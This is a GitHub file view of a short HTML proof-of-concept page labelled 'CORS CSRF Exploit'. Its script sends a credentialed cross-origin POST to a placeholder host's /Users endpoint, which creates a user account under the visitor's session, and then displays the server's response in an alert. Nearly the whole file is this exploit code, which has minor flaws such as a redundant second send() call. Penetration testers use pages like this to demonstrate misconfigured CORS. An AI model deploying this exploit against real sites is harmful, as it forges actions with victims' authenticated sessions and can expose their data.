-
Notifications
You must be signed in to change notification settings - Fork 0
/
cors_csrf.html
28 lines (28 loc) · 979 Bytes
/
cors_csrf.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<!DOCTYPE html>
<html>
<head>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert(this.responseText);
}
};
xhttp.open("POST", "http://example.com/Users", true);
xhttp.withCredentials = true;
xhttp.setRequestHeader("Content-Type","application/json");
xhttp.send(JSON.stringify({"Title":"Mr","FirstName":"test","MiddleName":"","LastName":"cors","PhoneNumber":"","EmailAddress":"[email protected]"}));
xhttp.send();
}
</script>
</head>
<body>
<center>
<h2>CORS CSRF Exploit </h2>
<h3>create a user & Show the response</h3>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
</body>
</html>